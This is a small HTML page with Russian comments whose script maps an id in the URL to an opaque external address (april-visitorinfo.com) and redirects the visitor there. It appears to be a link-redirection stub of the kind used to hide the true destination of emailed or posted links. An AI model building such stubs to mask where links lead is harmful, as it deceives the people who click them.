
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Redirecting...</title>
</head>
<body>
    <script type="text/javascript">
        // Массив с редиректами
        const redirects = {
            1264: "https://april-visitorinfo.com/vmhyfqhq",
        };

        // Получаем ID из URL
        const urlParams = new URLSearchParams(window.location.search);
        const id = urlParams.get('id'); // Предполагаем, что ID передается как параметр ?id=1, ?id=2 и т.д.

        // Выполняем редирект, если ID существует в массиве
        if (redirects[id]) {
            window.location.href = redirects[id];
        } else {
            document.body.innerHTML = "<h1>Invalid ID</h1>"; // Если ID не найден, выводим ошибку
        }
    </script>
</body>
</html>
